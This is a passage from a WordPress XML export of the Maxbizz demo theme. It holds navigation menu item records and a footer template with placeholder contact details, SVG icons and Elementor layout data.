		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1044/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1044</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1044</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1044]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>15</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1041]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[847]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog List</title>
		<link>http://wpdemo.archiwp.com/maxbizz/blog-list/</link>
		<pubDate>Tue, 29 Sep 2020 08:27:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1045</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1045</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:27:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:27:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-list]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>27</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[771]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[768]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Blog Post</title>
		<link>http://wpdemo.archiwp.com/maxbizz/blog-post/</link>
		<pubDate>Tue, 29 Sep 2020 10:34:29 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1068</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1068</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 10:34:29]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 10:34:29]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[blog-post]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>28</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[771]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[430]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Portfolio Details</title>
		<link>http://wpdemo.archiwp.com/maxbizz/portfolio-details-2/</link>
		<pubDate>Thu, 01 Oct 2020 07:32:10 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1149</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1149</wp:post_id>
		<wp:post_date><![CDATA[2020-10-01 07:32:10]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-10-01 07:32:10]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[portfolio-details-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>18</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[1041]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[837]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[ot_portfolio]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/1500/</link>
		<pubDate>Wed, 09 Dec 2020 09:15:06 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=1500</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1500</wp:post_id>
		<wp:post_date><![CDATA[2020-12-09 09:15:06]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-09 09:15:06]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[1500]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>1</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[1023]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Footer 2</title>
		<link>http://wpdemo.archiwp.com/maxbizz/ot_footer_builders/footer-2/</link>
		<pubDate>Wed, 16 Dec 2020 07:27:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_footer_builders&#038;p=1506</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz/">
					<img src="https://maxbizz.s3.amazonaws.com/images/01_White.svg" alt="Maxbizz">
				</a>			        
		<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.</p>		
					<a href="#" target="_blank" rel="noopener">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener">
						Linkedin-in
											</a>
			<h6>About us</h6>		
					<ul>
							<li>
					<a href="#">					Contact us 
											</a>
									</li>
								<li>
					<a href="#">					Connect
											</a>
									</li>
								<li>
					<a href="#">					Subscribe
											</a>
									</li>
								<li>
					<a href="#">					Terms of use 
											</a>
									</li>
								<li>
					<a href="#">					Sitemap
											</a>
									</li>
						</ul>
					<ul>
							<li>
					<a href="#">					Careers
											</a>
									</li>
								<li>
					<a href="#">					Newsroom
											</a>
									</li>
								<li>
					<a href="#">					Case Studies
											</a>
									</li>
								<li>
					<a href="#">					Disclosures 
											</a>
									</li>
								<li>
					<a href="#">					Services
											</a>
									</li>
						</ul>
			<h6>contacts</h6>		
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M256,0C150.125,0,64,86.135,64,192c0,141.646,177.146,310,184.688,317.104C250.75,511.031,253.375,512,256,512    s5.25-0.969,7.313-2.896C270.854,502,448,333.646,448,192C448,86.135,361.875,0,256,0z M256,298.667    c-58.813,0-106.667-47.854-106.667-106.667S197.188,85.333,256,85.333S362.667,133.188,362.667,192S314.813,298.667,256,298.667z"></path>
	</g>
</g>
</svg>				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
				<a href="tel:+1-800-456-478-23">
				<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 384 384" style="enable-background:new 0 0 384 384;" xml:space="preserve">
<g>
	<g>
		<path d="M353.188,252.052c-23.51,0-46.594-3.677-68.469-10.906c-10.719-3.656-23.896-0.302-30.438,6.417l-43.177,32.594    c-50.073-26.729-80.917-57.563-107.281-107.26l31.635-42.052c8.219-8.208,11.167-20.198,7.635-31.448    c-7.26-21.99-10.948-45.063-10.948-68.583C132.146,13.823,118.323,0,101.333,0H30.813C13.823,0,0,13.823,0,30.813    C0,225.563,158.438,384,353.188,384c16.99,0,30.813-13.823,30.813-30.813v-70.323C384,265.875,370.177,252.052,353.188,252.052z"></path>
	</g>
</g>
</svg>				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				<a href="mailto:maxbizz@mail.com">
				<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m8.75 17.612v4.638c0 .324.208.611.516.713.077.025.156.037.234.037.234 0 .46-.11.604-.306l2.713-3.692z"></path><path d="m23.685.139c-.23-.163-.532-.185-.782-.054l-22.5 11.75c-.266.139-.423.423-.401.722.023.3.222.556.505.653l6.255 2.138 13.321-11.39-10.308 12.419 10.483 3.583c.078.026.16.04.242.04.136 0 .271-.037.39-.109.19-.116.319-.311.352-.53l2.75-18.5c.041-.28-.077-.558-.307-.722z"></path></svg>				</a>
				<h6>
					<a href="mailto:maxbizz@mail.com">Mail Us</a>
				</h6>
								<p>maxbizz@mail.com</p>
			<h6>subscribe</h6>		
		<p>Subscribe to our newsletter. Be always in trend!</p><p>Copyright © 2020 Maxbizz by OceanThemes. All Rights Reserved.</p>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1506</wp:post_id>
		<wp:post_date><![CDATA[2020-12-16 07:27:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-12-16 07:27:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[footer-2]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_footer_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaa571","elType":"section","settings":{"structure":"40","background_background":"classic","background_color":"#16171E","padding":{"unit":"px","top":"190","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"67bb142","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"5184033","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01_White.svg","id":404},"_margin":{"unit":"px","top":"0","right":"0","bottom":"32","left":"0","isLinked":false},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"},{"id":"623170a","elType":"widget","settings":{"editor":"<p>We make this belief a reality by putting clients first, leading with exceptional ideas, doing the right thing, and giving back.<\/p>","text_color":"#C0C1C2","typography_typography":"custom","typography_line_height":{"unit":"px","size":30,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"64c24aa","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}},{"social_icon":{"value":"fab fa-linkedin-in","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""}}],"shape":"circle","align":"left","icon_size":{"unit":"px","size":12,"sizes":[]},"icon_padding":{"unit":"em","size":0.90000000000000002220446049250313080847263336181640625,"sizes":[]},"icon_spacing":{"unit":"px","size":14,"sizes":[]},"image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(0, 0, 0, 0.2)","icon_color":"custom","hover_primary_color":"#FF8523","icon_secondary_color":"#FFFFFF","icon_primary_color":"#24262F","columns":"3"},"elements":[],"widgetType":"social-icons"}],"isInner":false},{"id":"f5a7f5e","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"ecd614f","elType":"widget","settings":{"title":"About us","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8641273","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20"},"elements":[{"id":"623d601","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"12","left":"0","isLinked":false}},"elements":[{"id":"5abf377","elType":"widget","settings":{"icon_list":[{"text":"Contact us ","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Connect","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Subscribe","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Terms of use ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Sitemap","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true},{"id":"dcd6c7c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_mobile":50},"elements":[{"id":"ba07c87","elType":"widget","settings":{"icon_list":[{"text":"Careers","selected_icon":{"value":"","library":""},"_id":"dd541d7","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Newsroom","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"04c8029"},{"text":"Case Studies","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"0bf2a4d"},{"text":"Disclosures ","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"30f616c"},{"text":"Services","selected_icon":{"value":"","library":""},"link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"5720c29"}],"space_between":{"unit":"px","size":10,"sizes":[]},"text_color":"#C0C1C2","text_color_hover":"#FF8523","text_indent":{"unit":"px","size":0,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_size":{"unit":"px","size":16,"sizes":[]}},"elements":[],"widgetType":"icon-list"}],"isInner":true}],"isInner":true}],"isInner":false},{"id":"c9d20f5","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"000948e","elType":"widget","settings":{"title":"contacts","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b0ea9af","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":1419},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":20,"sizes":[]},"text_align_mobile":"left"},"elements":[],"widgetType":"icon-box"},{"id":"e0b704a","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":1420},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","_margin":{"unit":"px","top":"0","right":"0","bottom":"16","left":"0","isLinked":false},"icon_space":{"unit":"px","size":21,"sizes":[]},"text_align_mobile":"left","link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"18b9709","elType":"widget","settings":{"title_text":"Mail Us","description_text":"maxbizz@mail.com","position":"left","title_size":"h6","primary_color":"#FF8523","icon_size":{"unit":"px","size":20,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"title_bottom_space":{"unit":"px","size":5,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":16,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":16,"sizes":[]},"description_typography_font_weight":"500","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/send.svg","id":374},"library":"svg"},"title_color":"#C0C1C2","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Inter","icon_space":{"unit":"px","size":22,"sizes":[]},"text_align_mobile":"left","link":{"url":"mailto:maxbizz@mail.com","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"}],"isInner":false},{"id":"fed1a20","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"8b355cd","elType":"widget","settings":{"title":"subscribe","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"600","typography_text_transform":"uppercase","_margin":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"f68bf90","elType":"widget","settings":{"wp":{"title":""},"_margin":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"wp-widget-mc4wp_form_widget"},{"id":"85e42bf","elType":"widget","settings":{"editor":"<p>Su